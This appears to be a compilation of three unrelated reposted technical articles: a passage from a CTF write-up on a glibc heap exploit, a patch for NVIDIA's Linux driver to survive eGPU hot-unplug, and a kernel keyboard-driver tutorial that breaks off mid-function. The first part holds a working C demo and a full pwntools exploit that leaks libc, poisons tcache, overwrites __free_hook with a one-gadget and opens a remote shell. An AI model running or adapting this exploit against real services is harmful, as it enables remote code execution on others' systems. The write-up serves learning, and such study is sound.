In our examples, the first allocated chunk has a different size than the others, 0x108. The example would also work with 0xf8, but in this challenge the data is copied with strcpy, which stops at a NULL byte, so we couldn’t write a prev_size of 0x200 (its lowest byte is a NULL). With a first chunk of size 0x108, the required prev_size becomes 0x210, which we can write.

We can accomplish the same attack on a newer libc using the same algorithm, with one difference: before freeing the chunks we need to make the relevant tcache bins full. The attack below performs the same leak as before but then goes further. After the leak it creates a double free, because B and b point to the same chunk of size 0x1f8, and then performs the double free / tcache poisoning attack described above.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c has prev_inuse=0 and prev_size=0x210, so it will consolidate
    // with a and b and be put in the unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now the 0x1F8 tcache bin contains the same chunk twice

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = (long)&var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

The last step is to implement the exploit in Python. It does the same thing as the previous code, except that the poisoned malloc returns a region at &__free_hook. We then overwrite __free_hook with a one-gadget RCE address, which is triggered when free is called.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricky because data is copied into the chunk by strcpy, which
# stops copying at a NULL byte.
# If we want to zero out a region we need to free and allocate several
# chunks, each one byte smaller than the previous one.
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c has prev_inuse=0 and prev_size=0x210, so it will consolidate
# with a and b and be put in the unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are full
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now the 0x1F8 tcache bin contains the same chunk twice

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)


Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve been using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to the iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quite reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.

There’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceded by whining from PCIe AER, sometimes not; I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. It hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars), passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:

insmod.sh
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

Let’s write a Kernel with keyboard and screen support

original text

Today, we will extend that kernel to include a keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific addresses on the x86’s I/O bus, nothing more. The read/write operations on these ports are accomplished using specific instructions built into the processor.

 

Reading from and Writing to ports

read_port:
	mov edx, [esp + 4]
	in al, dx	
	ret

write_port:
	mov   edx, [esp + 4]    
	mov   al, [esp + 4 + 4]  
	out   dx, al  
	ret

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as an argument. When your function is called, its arguments are pushed onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are passed through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.

 

Interrupts

Now, before we go ahead with writing any device driver, we need to understand how the processor gets to know that a device has performed an event.

The easiest solution is polling: keep checking the status of the device forever. This, for obvious reasons, is neither efficient nor practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A device or a chip called Programmable Interrupt Controller (PIC) is responsible for x86 being an interrupt driven architecture. It manages hardware interrupts and sends them to the appropriate system interrupt.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value stored during initialization of the PIC. It adds the input line number to this offset to form the Interrupt number. Then the processor looks up a certain data structure called the Interrupt Descriptor Table (IDT) to give the interrupt handler address corresponding to the interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;
};

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
{
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;
	

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1
	*/

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	/*
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	*/
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
